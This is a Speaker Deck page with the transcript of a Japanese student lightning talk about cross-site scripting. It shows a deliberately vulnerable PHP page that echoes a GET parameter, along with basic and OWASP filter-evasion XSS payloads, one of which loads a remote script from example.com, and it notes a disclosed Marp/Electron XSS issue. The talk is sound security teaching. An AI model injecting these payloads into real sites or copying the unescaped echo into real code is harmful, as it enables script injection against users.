Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
XSSの入力値を調べてみた / searching xss insertion value
Search
Tomoyuki KOYAMA
February 03, 2018
Technology
3
1.4k
XSSの入力値を調べてみた / searching xss insertion value
2018/02/03 学生LT at freee
Tomoyuki KOYAMA
February 03, 2018
Tweet
Share
More Decks by Tomoyuki KOYAMA
See All by Tomoyuki KOYAMA
Reading HTTP Client Hints
tomoyk
0
69
Log message with JSON item count for root cause analysis in microservices
tomoyk
0
170
Distributed Log Search Based on Time Series Access and Service Relations
tomoyk
0
300
Webアプリを動かすまでのインフラ構築 / infra-build-for-web-app
tomoyk
0
390
コンピュータが大好きな私が大学院進学した理由 / Why I chose graduate school
tomoyk
2
840
この先生きのこるための学び方 / how-to-learn-tech
tomoyk
1
360
佐川急便のフィッシングサイトを調べてみた / Analysis of sagawa fishing site
tomoyk
1
160
既存のWebアプリをセキュアにするためにやったこと / Student-LT-WebSec
tomoyk
0
170
パケットを覗いてみよう / Packet workshop for beginners
tomoyk
0
310
Other Decks in Technology
See All in Technology
サーバシステムを無理なくコンテナ移行する際に伝えたい4つのポイント/Container_Happy_Migration_Method
ozawa
1
110
「家族アルバム みてね」を支えるS3ライフサイクル戦略
fanglang
3
430
ペアーズにおけるData Catalog導入の取り組み
hisamouna
0
220
技術好きなエンジニアが _リーダーへの進化_ によって得たものと失ったもの / The Gains and Losses of a Tech-Enthusiast Engineer’s “Evolution into Leadership”
kaminashi
0
220
Go製のマイグレーションツールの git-schemalex の紹介と運用方法
shinnosuke_kishida
1
570
RAGの基礎から実践運用まで:AWS BedrockとLangfuseで実現する構築・監視・評価
sonoda_mj
0
450
Javaの新しめの機能を知ったかぶれるようになる話 #kanjava
irof
3
5k
Amazon Q Developer 他⽣成AIと⽐較してみた
takano0131
1
130
LINEギフトのLINEミニアプリアクセシビリティ改善事例
lycorptech_jp
PRO
0
310
お問い合わせ対応の改善取り組みとその進め方
masartz
1
440
Multitenant 23ai の全貌 - 機能・設計・実装・運用からマイクロサービスまで
oracle4engineer
PRO
2
130
Redefine_Possible
upsider_tech
0
340
Featured
See All Featured
The Power of CSS Pseudo Elements
geoffreycrofte
75
5.7k
How To Stay Up To Date on Web Technology
chriscoyier
790
250k
CSS Pre-Processors: Stylus, Less & Sass
bermonpainter
356
30k
Practical Orchestrator
shlominoach
186
10k
Cheating the UX When There Is Nothing More to Optimize - PixelPioneers
stephaniewalter
280
13k
YesSQL, Process and Tooling at Scale
rocio
172
14k
Learning to Love Humans: Emotional Interface Design
aarron
273
40k
The Web Performance Landscape in 2024 [PerfNow 2024]
tammyeverts
4
500
Adopting Sorbet at Scale
ufuk
75
9.3k
Put a Button on it: Removing Barriers to Going Fast.
kastner
60
3.8k
Building a Modern Day E-commerce SEO Strategy
aleyda
39
7.2k
Keith and Marios Guide to Fast Websites
keithpitt
411
22k
Transcript
XSS
B1 Twitter: @tmyk_kym : https://blog.koyama.me/ : Network/Web/Server/Security : PyCon JP,
Seccamp, etc
XSS (Cross Site Scripting) HTML CWE-79: Improper Neutralization of Input
During Web Page Generation ('Cross-site Scripting') (3.0)
... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];
?></h1> $_GET['mode'] hello <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1>hello</h1>
... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];
?></h1> $_GET['mode'] <script>alert()</script> <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><script>alert()</script></h1>
XSS Stored XSS( ) Re ected XSS( ) DOM Based
XSS
XSS == XSS
<script>alert(1)</script> "><script>alert(1)</script> " onmouseover="alert(1) x" onerror="alert(1) <- img src javascript:alert(1)
<- a href
XSS
? / . XSS . XSS .
?
OWASP OWASP XSS 2015 XSS - OWASP https://jpcertcc.github.io/OWASPdocuments/CheatSheets/XSSFilterEvasion.html
( ) 3
[1] <SCRIPT/XSS SRC="http://example.com/xss.js"> </SCRIPT> / . ... <script xss="" src="http://example.com/xss.js">
</script>
[2] <<SCRIPT>alert("XSS");//<</SCRIPT> HTML XSS . ... "><script> alert("XSS");//< </script>
[3] <img src=x onerror=javas cript:ale rt('XSS')> &#x... HTML (16 )
. ... <img src="x" onerror="javascript:alert('XSS')">
( )
( ) <img src=javascript:alert('XSS')> <img src=javascript: alert(String.fromCharCode(88,83,83))> <META HTTP-EQUIV="refresh" CONTENT="3;
URL=http://;URL=http://yahoo.co.jp/;">
None
Electron Marp Electron Web ... <script>alert()</script> alert ...( )
?
JVN#21174546: Marp JavaScript https://jvn.jp/jp/JVN21174546/ However, sanitizing inline script should consider
on future. [Security issue] Remote script can read user local resource · Issue #187 · yhatt/marp “ “
XSS XSS alert() Electron
tomoyk
ozawa
fanglang
hisamouna
kaminashi
shinnosuke_kishida
sonoda_mj
irof
takano0131
lycorptech_jp
masartz
oracle4engineer
upsider_tech
geoffreycrofte
chriscoyier
bermonpainter
shlominoach
stephaniewalter
rocio
aarron
tammyeverts
ufuk
kastner
aleyda
keithpitt
![... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_3.jpg){kind=link}
![... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_4.jpg){kind=link}
![[1] <SCRIPT/XSS SRC="http://example.com/xss.js"> </SCRIPT> / . ... <script xss="" src="http://example.com/xss.js">](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_13.jpg){kind=link}
![[2] <<SCRIPT>alert("XSS");//<</SCRIPT> HTML XSS . ... "><script> alert("XSS");//< </script>](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_14.jpg){kind=link}
![[3] <img src=x onerror=javas cript:ale rt('XSS')> &#x... HTML (16 )](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_15.jpg){kind=link}
